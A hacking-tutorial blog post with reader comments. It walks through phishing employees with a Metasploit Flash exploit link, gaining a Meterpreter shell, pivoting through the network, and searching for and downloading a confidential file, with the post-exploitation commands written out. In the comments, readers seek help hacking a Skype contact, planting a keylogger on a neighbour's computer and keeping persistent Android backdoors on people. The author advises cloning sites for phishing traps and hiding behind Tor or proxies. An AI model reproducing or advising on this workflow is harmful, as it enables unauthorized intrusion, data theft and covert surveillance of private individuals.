Hack Like a Pro: How to Spy on Anyone, Part 2 (Finding & Downloading Confidential Documents)

How to Spy on Anyone, Part 2 (Finding & Downloading Confidential Documents)

Welcome back, my tenderfoot hackers!

A short while ago, I started a new series called "How to Spy on Anyone." The idea behind this series is that computer hacking is increasingly being used in espionage and cyber warfare, as well as by private detectives and law enforcement to solve cases. I am trying to demonstrate, in this series, ways that hacking is being used in these professions. For those of you who are training for those careers, I dedicate this series.

In some cases, when we are charged with spying on a suspect, we want to be able to go into their computer, look around, and download files or other documents that might be confidential, useful to a nation or cause, or might be used in a prosecution. In the world of cyber warfare, these might be strategic plans, communiqués, weapon assessments, etc.

In this tutorial, we will hack into our enemy's computers and look for secret documents that might indicate their future war plans that may compromise the sovereign integrity of our nation. We think that our adversary is secretly sneaking soldiers and intelligence agents into our country and claiming that they are freedom fighters. (Sound familiar?)

Our task is to hack into their military leaders computers and find evidence that these freedom fighters are actually soldiers and agents of our adversarial, but very powerful neighbor. Not only must we find the information, but we must download a copy so that we we can show our leaders, and maybe the world, the evidence of their malevolent intentions and actions.

Our strategy will be to attempt to compromise someone's computer at headquarters—anyone's. Once we have compromised their computer, we can then pivot from there to any computer on the network and then search for confidential files and, if we find any, transfer them back to our computer.

Let's get started on this critical and dangerous task to our nation's survival!

Step 1: Set Our Exploit Strategy

As we saw earlier, Adobe Flash Player is among the most vulnerable applications on nearly everyone's computer. If you using a browser, you probably have Adobe's Flash Player on your computer. This makes it a very attractive target.

In an earlier tutorial, I showed how we can exploit Adobe Flash Player on nearly every computer with Internet Explorer 6-11 with Flash 11-13 on Windows XP SP3, Windows 7 SP1, and Windows 8. That's a pretty broad brush of targets. Perfect for this job!

The only drawback is that we need to get someone to click on a malicious link. Although everyone is warned not to, people still do so every day when they receive an email from someone they think they know, or even if the email sounds compelling enough. Even you may have done so.

Step 2: Harvest Email Addresses

We only need one person at the headquarters to click on our link to take down the entire network. As our first step, let's gather email addresses from headquarters using Maltego. To learn how to use Maltego to harvest email addresses, check out this tutorial.

Step 3: Send the Email with the Link

Now, that we have the emails of employees at our enemy's headquarters, let's generate the malicious code in Metasploit and launch our server with the code. To learn how to use this exploit, check out this tutorial.

Now that our server is up with the malicious code, let's send emails with this link to all the employees we found with Maltego.

Step 4: Now...Wait

Sometimes the best advice is simply to be patient. We sent out the emails to all the employees at headquarters and now we simply need to be patient and wait for someone to click on the link we sent.

Step 5: Success!

We waited nearly 48 hours, but finally—success! Someone clicked on our link and we have a Meterpreter shell on their system!

Step 6: Pivot Through the Network

Now that we own one machine on the network, we can do an ARP scan to find every other machine on the network. This will give us the IP address and MAC address of every machine on this network.

meterpreter > run arp_scan -r

Next, we can pivot so that we can access all the systems on the network. To learn how to pivot to the entire network, just check out this tutorial.

Step 7: Look Around

Since we only found two systems on this network, let's look inside the machine we compromised first before going on to the others. We know the document we are looking for is likely named "war strategy." We can search the entire hard drive of the compromised system by using the search command built into the Meterpreter.

meterpreter > search -f "war strategy.txt"

Great ! We found it in the directory c:\confidential !

Step 8: Download

Now that we have the document we are looking for, let's download it from the target's computer to ours.

meterpreter > download c:\\confidential\\"war strategy.txt"

Finally, let's check to see whether the file arrived at our system. The Meterpreter will send the file to the last working directory where we invoked the msfconsole. In this case, it was /root. So, let's go back to our Kali system, open a terminal and navigate to /root, and see whether the "war strategy.txt" file has arrived.

kali > cd /root

kali> ls -l

There it is! Success!

We now have the file that lays out our enemy's war strategy and may be critical to saving our nation from invasion and subordination to our most hated neighbor and adversary!

Keep coming back, my tenderfoot hackers, as we master the fine arts of hacking!

Just updated your iPhone? You'll find new features for Podcasts, News, Books, and TV, as well as important security improvements and fresh wallpapers. Find out what's new and changed on your iPhone with the iOS 17.5 update.

Cover image via Shutterstock


When you wait for someone clicking on the link, do you let your programm and your pc run?
And when someone clicked on the link does it matter if his/her pc was once closed when i get in the system?


You must not leave you computer run while waiting for the connection, but if you are trying to save you country, isn't that small price?

If her computer has rebooted after the click, you will loose the connection unless you use persistence.


Do I have to save the process or is it ok to just start a new one with the same data?
To save the country, for sure but not necessary for learning purpose.

Thanks for your answers.

This particular hack requires a web server be running, so if they click when your computer is off, you missed your opportunity.

Ok. Thank you for your help.

Awesome as always OTW thanks for the detailed articles. The only thing i can't really figure out is how to stay anonymous and hide your tracks when performing these kinds of wan attacks. is it vpn? or other compromised machines? tor? any explanation highly appreciated.

thanks again!


It depends upon who you are trying to hide from. If you are trying to remain anonymous from NSA, you will likely need all three techniques and even that isn't guaranteed. Otherwise, proxies and ToR work very well.


Thanks, OTW.

Amazing tutorial brother (Y) :D very well written and guys don't worry you can use VPS also :p

Hey OTW, a guy I know has recently photoshopped a picture of my face. The problem is I fear he will show people, and thus embarrass me. Is there a way for me to hack him via skype (i have him as a friend on skype) and perhaps have control over his computer and delete the picture?

could you perhaps make a post about it? Although if it poses too much trouble, its fine.

If you study here at Null Byte, I'm sure you can figure it out on your own.

Ok, I will be sure to do so. I would just like to thank you, its not every day someone as knowledgeable as you takes the time out of their day to respond to peoples question. Thank you, truly.

I understand how to make a webserver, i was wondering if you could make a tutorial on how to make a believable website so they don't obviously know it's a trap? Also how to port forward the webserver so it doesn't work only on local network? I love your tutorials but I don't know how to make a believable website


You don't need to make a believable website. Simply copy another site. You can use httrack to copy someone else's website and host it then on your server.


do i have to send the link via Email? or i can send it on the chat on facebook or skype

using your tutorials, if I hack a neighbours wifi password, and access his network, can I then transfer my keylogger to his system and activate it remotely? I mean it'd be better than trying my luck with an email and a link

Yes, if you can get the meterpreter on his machine, there is a software keylogger you can install.

what I meant is whether or not it's possible to get the meterpreter on his machine through his wifi rather than having to send it through an email. Thanks :)

I understood that we could search for a document and that's it. But how can I know more about what can I do there? I mean, when the meterpreter is on (the person clicked) what's the options I can type to make something more destructible? Like deleting files in their computer, transferring a trojan horse RAT (like I can control everything including the movement of the mouse)...

does it matter if i have dynamic or static ip? do i loose sessions if i close it while i have dynamic ip?

I might be asking a repetitive question but is there any effective way to make a persistent backdoor hack for android mobiles. Like I want to hack one or multiple people not on my network whenever I want to. Is that possible? Could someone show me a guide how to do that.

Share Your Thoughts

  • Hot
  • Latest